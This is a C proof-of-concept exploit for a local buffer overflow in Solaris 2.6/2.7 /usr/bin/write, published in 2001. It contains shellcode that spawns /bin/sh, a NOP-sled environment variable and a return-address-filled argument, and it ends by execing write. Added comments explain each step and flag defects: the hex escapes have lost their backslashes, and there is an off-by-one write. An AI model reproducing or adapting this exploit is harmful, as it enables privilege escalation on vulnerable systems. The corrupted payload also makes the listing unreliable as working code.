
# Title : Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit
# Published : 2001-01-25
# Author : Pablo Sor


#include <stdio.h>
#include <unistd.h>
/*

  /usr/bin/write overflow proof of concept.

  Tested on Solaris 7 x86

  Pablo Sor, Buenos Aires, Argentina. 01/2000
  psor@afip.gov.ar

  usage: write-exp [shell_offset] [ret_addr_offset]

  default offset should work.

*/
/* Reads the current stack pointer by moving %esp into %eax and relying on
 * %eax being the integer return register; there is no return statement, so
 * the value only reaches the caller if the compiler emits nothing that
 * clobbers %eax afterwards.  32-bit x86 only (register names), and falling
 * off the end of a non-void function whose result is used is undefined
 * behavior in C -- this is compiler-specific, not portable code. */
long get_esp() { __asm__("movl %esp,%eax"); }

/* Payload placed in the environment by main(); credited below to Cheez Whiz.
 * As reproduced on this page the hex escapes have lost their backslashes, so
 * each literal is ordinary ASCII text rather than the intended bytes -- the
 * listing is not byte-accurate.  The trailing 0xff run is padding; main()
 * uses strlen(shell) to position this array, so the array length, not a
 * fixed size, determines where it lands inside the 0x90-filled buffer.
 * Historical (2001) proof of concept: the class of bug it targets is
 * mitigated today by non-executable stacks and stack protectors. */
char shell[] =
  "xebx45x9axffxffxffxffx07xff"
  "xc3x5ex31xc0x89x46xb7x88x46"
  "xbcx88x46x07x89x46x0cx31xc0"
  "xb0x2fxe8xe0xffxffxffx52x52"
  "x31xc0xb0xcbxe8xd5xffxffxff"
  "x83xc4x08x31xc0x50x8dx5ex08"
  "x53x8dx1ex89x5ex08x53xb0x3b"
  "xe8xbexffxffxffx83xc4x0cxe8"
  "xbexffxffxffx2fx62x69x6ex2f"
  "x73x68xffxffxffxffxffxffxff"
  "xffxff";

  /* shellcode by Cheez Whiz */

/* Entry point: builds an environment variable and an oversized argument,
 * then execs /usr/bin/write with them.
 *
 * argv[1], argv[2] (optional, both required together): decimal offsets added
 *   to get_esp() for the overwritten return value and for the address the
 *   payload is expected at.  They are parsed with atoi() and never range
 *   checked; any other argument count falls back to the built-in offsets.
 *
 * Notes for the reader:
 * - `void main` is non-standard; malloc, memset, memcpy, strlen, atoi and
 *   putenv are called although only <stdio.h> and <unistd.h> are included,
 *   so on a conforming compiler they are implicitly declared (an error in
 *   C99 and later).
 * - The malloc() result is never checked.
 * - execl() only returns on failure; that return is not checked, so a failed
 *   exec ends the program silently. */
void main(int argc,char **argv)
{
  FILE *fp;
  long magic,magicret;
  char buf[100],*envi;
  int i;

  /* 1000-byte environment string: "SOR=" followed by 0x90 filler with the
   * payload copied so that it ends at byte 980.  envi[1000]=0 writes one
   * byte past the end of the 1000-byte allocation (off-by-one heap write in
   * the exploit itself); the 0x90 bytes before it are not NUL, so the string
   * passed to putenv is only terminated by that out-of-bounds byte. */
  envi = (char *) malloc(1000*sizeof(char));
  memset(envi,0x90,1000);
  memcpy(envi,"SOR=",4);
  memcpy(envi+980-strlen(shell),shell,strlen(shell));
  envi[1000]=0;
  putenv(envi);

  /* Both addresses are derived from this process's own stack pointer, so
   * they are only meaningful if the exec'd program's stack lands at a
   * predictable distance from it (no ASLR; same environment size). */
  if (argc!=3)
  {
    magicret = get_esp()+116;
    magic = get_esp()-1668;
  }
  else
  {
    /* atoi() silently yields 0 for non-numeric input. */
    magicret = get_esp()+atoi(argv[1]);
    magic = get_esp()+atoi(argv[2]);
  }

  /* 100-byte argument: 'A' filler, NUL at [99], `magic` at bytes 91..94 and
   * `magicret` repeated in every 4-byte slot of bytes 0..87 (22 copies). */
  memset(buf,0x41,100);
  buf[99]=0;
  memcpy(buf+91,&magic,4);
  for(i=0;i<22;++i) memcpy(buf+(i*4),&magicret,4);
  /* Execs the target with "root" as the recipient and buf as the message
   * argument; `fp` above is never used.  A process-execution log showing
   * write(1) invoked with a ~99-byte argument of repeated bytes is the
   * observable artifact of this PoC. */
  execl("/usr/bin/write","write","root",buf,(char *)0);
}

